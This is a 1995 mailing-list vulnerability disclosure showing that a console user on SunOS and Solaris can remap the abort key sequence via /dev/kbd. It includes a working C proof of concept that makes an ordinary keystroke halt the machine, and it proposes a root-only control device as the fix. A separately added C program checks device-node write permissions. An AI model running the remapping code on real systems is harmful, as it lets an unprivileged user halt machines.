little whole on Suns concerning /dev/kbd
Arfst Ludwig (Arfst.Ludwig luxor.in-berlin.de)
Sat, 2 Dec 1995 23:56:03 +0100
Hi!
On a SUN with SunOS 4.1.* or Solaris 2.* any user logged in on the console can
remap the abort key sequence (the key sequence to enter the boot monitor).
Impact: Any arbitrary key sequence can enter the boot monitor and halt
the machine.
The abort key sequence can easily be remapped, e.g. to shift_l a. Instead of
getting an `A' the user gets the boot monitor prompt:
8<--------------------------- cut here ----------------------------
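#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sundev/kbd.h>
#include <sundev/kbio.h>

int main()
{
    int fd;
    struct kiockey k;

    /* /dev/kbd can be opened read/write by the user logged in on the console */
    fd = open("/dev/kbd", O_RDWR);
    if (fd < 0) {
        perror("/dev/kbd");
        return (1);
    }

    /* first key of the abort sequence */
    k.kio_tablemask = KIOCABORT1;
    k.kio_station = 0x6e;
    ioctl(fd, KIOCSETKEY, &k);

    /* second key of the abort sequence */
    k.kio_tablemask = KIOCABORT2;
    k.kio_station = 0x4d;
    ioctl(fd, KIOCSETKEY, &k);

    close(fd);
    return (0);
}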
8<--------------------------- cut here ----------------------------
Is there a fix possible? /dev/kbd should be readable to the user logged
in at the console. Redefining the abort sequence should only be allowed
via a new device, e.g. /dev/kbdctl, which is accessible only by root.
Cheers, Arfst
______________________________________________________________________
__
(00) Arfst Ludwig
\`\/ E-Mail: Arfst.Ludwig luxor.in-berlin.de
"" carpe diem
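
The separation the post asks for (a control node only root can write) can be checked from a node's owner and mode bits. The following is an added example, not part of the original message or of any Sun software; `nonroot_can_write` and `audit_node` are hypothetical helper names, and any group or other write bit is treated as exposure without resolving group membership.

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Returns 1 if an account other than root could open a node with this
 * owner and mode for writing, 0 if only root can. Any group or other
 * write bit counts as exposure (conservative assumption: group
 * membership is not resolved here). */
int nonroot_can_write(uid_t owner, mode_t mode)
{
    if (mode & (S_IWGRP | S_IWOTH))
        return 1;
    return (owner != 0 && (mode & S_IWUSR)) ? 1 : 0;
}

/* Stats a device node and applies the check above.
 * Returns -1 if the node cannot be examined, otherwise 0 or 1. */
int audit_node(const char *path)
{
    struct stat st;

    if (stat(path, &st) != 0)
        return -1;
    return nonroot_can_write(st.st_uid, st.st_mode);
}

int main(void)
{
    /* /dev/kbd is the node from the post; /dev/kbdctl is the separate
     * control node the post proposes. */
    const char *nodes[] = { "/dev/kbd", "/dev/kbdctl" };
    size_t i;

    for (i = 0; i < sizeof nodes / sizeof nodes[0]; i++) {
        int r = audit_node(nodes[i]);
        printf("%-12s %s\n", nodes[i],
               r < 0 ? "not present" :
               r ? "writable by a non-root account" : "root-only for writing");
    }
    return 0;
}
```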